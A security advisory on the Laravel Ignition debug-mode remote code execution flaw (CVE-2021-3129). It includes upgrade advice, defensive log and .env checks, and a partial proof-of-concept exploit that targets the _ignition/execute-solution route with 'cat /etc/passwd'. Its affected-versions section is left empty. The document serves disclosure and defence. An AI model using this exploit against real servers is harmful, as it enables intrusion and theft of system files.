Remote Code Execution Vulnerability: Laravel Debug Mode
1. Vulnerability overview

Laravel is a concise, open-source PHP web development framework built around the MVC architecture for web applications. When Laravel runs with debug mode enabled, the bundled Ignition component uses file_get_contents() and file_put_contents() unsafely. An attacker can send crafted requests, for example by constructing a malicious log file, to trigger Phar deserialization and ultimately achieve remote code execution.

2. Affected versions

Laravel

```python
# Fragment of the proof-of-concept script: the beginning of the file (imports, the
# rest of the Exp class, and the section heading before it) was lost in extraction.
# Only the surviving tail is shown here, re-indented; it is not runnable on its own.
            if echo_find >= 0:
                return text[echo_find + self.__delimiter_len + 1: text.find(self.__delimiter, echo_find + 1)]
            else:
                return "[-] RCE echo is not found."

    def exp(self):
        for gadget_chain in self.__gadget_chains.keys():
            print("[*] Try to use %s for exploitation." % (gadget_chain))
            self.__clear_log()
            self.__clear_log()
            self.__payload_send('a' * 2)
            self.__payload_send(self.__gen_payload(gadget_chain))
            self.__decode_log()
            print("[*] Result:")
            print(self.__rce())

    def __init__(self, target, command):
        self.target = target
        self.__url = req.compat.urljoin(target, "_ignition/execute-solution")
        self.__command = self.__command_handler(command)
        if not self.__vul_check():
            print("[-] [%s] is seems not vulnerable." % (self.target))
            print("[*] You can also call obj.exp() to force an attack.")
        else:
            self.exp()


def main():
    Exp("http://127.0.0.1:8888", "cat /etc/passwd")


if __name__ == '__main__':
    main()
```

4. Security advice

Upgrade the Laravel framework to 8.4.3 or later, or upgrade the Ignition component to 2.5.2 or later.

Download link: https://laravel.com/docs/8.x#laravel-the-fullstack-framework

References:
https://mp.weixin.qq.com/s/ShRvF_YeV9JbJJnOUjklCw
https://github.com/SNCKER/CVE-2021-3129
https://www.venustech.com.cn/new_type/aqtg/20210114/22299.html

Source: https://www.freebuf.com/vuls/262489.html
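As a defender-side complement to the advice above (an added example, not code from the original article or from the SNCKER proof of concept), the following Python checks the two things an operator can verify quickly: whether a Laravel .env still leaves APP_DEBUG on, using Laravel 8's env() casting rules plus the (bool) cast in config/app.php, and whether web-server access logs show requests to the Ignition solution-runner route (_ignition/execute-solution) that the script above posts to. The log lines and .env contents are constructed samples.

```python
import re
from typing import List

# Constructed sample access-log lines (nginx "combined" format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Jan/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
10.0.0.7 - - [14/Jan/2021:10:01:09 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 34 "-" "python-requests/2.25.1"
10.0.0.7 - - [14/Jan/2021:10:01:10 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 0 "-" "python-requests/2.25.1"
10.0.0.9 - - [14/Jan/2021:10:02:00 +0000] "GET /login HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Ignition's solution-runner route, the endpoint the proof of concept posts to.
IGNITION_SOLUTION_PATH = "/_ignition/execute-solution"

def find_ignition_solution_requests(log_text: str) -> List[dict]:
    """Return parsed entries for every request to the solution-runner route.

    In production this route should not be reachable at all, so any hit is
    worth an alert regardless of the response status.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = m.group("path").split("?", 1)[0].rstrip("/")
        if path == IGNITION_SOLUTION_PATH:
            hits.append(m.groupdict())
    return hits

# Values that Laravel 8's env() helper plus the (bool) cast in config/app.php
# treat as false. Anything else, including "no" or "off", leaves debug ON.
_FALSY_ENV_VALUES = {"", "0", "false", "(false)", "null", "(null)", "empty", "(empty)"}

def debug_mode_enabled(env_text: str) -> bool:
    """Report whether a .env file turns APP_DEBUG on (the precondition for this bug)."""
    for raw in env_text.splitlines():
        line = raw.strip()
        if line.startswith("#") or not line.startswith("APP_DEBUG="):
            continue
        value = line.split("=", 1)[1].strip().strip('"').strip("'")
        return value.lower() not in _FALSY_ENV_VALUES
    return False  # config/app.php defaults APP_DEBUG to false when it is unset
```

Note that APP_DEBUG=no still enables debug mode under these casting rules, which is why the check compares against the explicit falsy set rather than looking for the word "true".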